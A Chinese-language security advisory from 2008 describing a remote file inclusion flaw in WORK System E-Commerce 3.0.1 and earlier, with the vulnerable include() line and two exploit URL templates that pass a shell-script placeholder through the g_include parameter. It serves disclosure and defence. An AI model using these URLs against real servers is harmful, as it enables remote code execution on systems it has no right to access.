WORK System E-Commerce g_include参数远程文件包含漏洞
添加时间:
2008-10-04
系统编号:
WAVDB-01076
影响版本:
WORK system e-commerce <= 3.0.1
程序介绍:
漏洞利用:
2008-10-04
系统编号:
WAVDB-01076
影响版本:
WORK system e-commerce <= 3.0.1
程序介绍:
WORK System E-Commerce是一款动态内容和站点管理系统。
漏洞分析:
WORK System E-Commerce在处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意指令。
WORK System E-Commerce的index.php和module/forum/forum.php脚本没有正确验证g_include参数的输入,允许攻击者通过包含本地或外部资源文件执行任意PHP代码。漏洞相关的代码如下:
include ($g_include."<file>.inc");
漏洞利用:
http://[host]/work/index.php?g_include=[shell_script] http://[host]/work/module/forum/forum.php?g_include=[shell_script]
解决方案:
厂商补丁:
Laurent Van den Reysen
----------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://prdownloads.sourceforge.n ... _3_0_1.zip?download
信息来源:
<*来源:SlimTim10 (slimtim10@gmail.com)
链接:http://secunia.com/advisories/22963/
http://www.milw0rm.com/exploits/2752
*>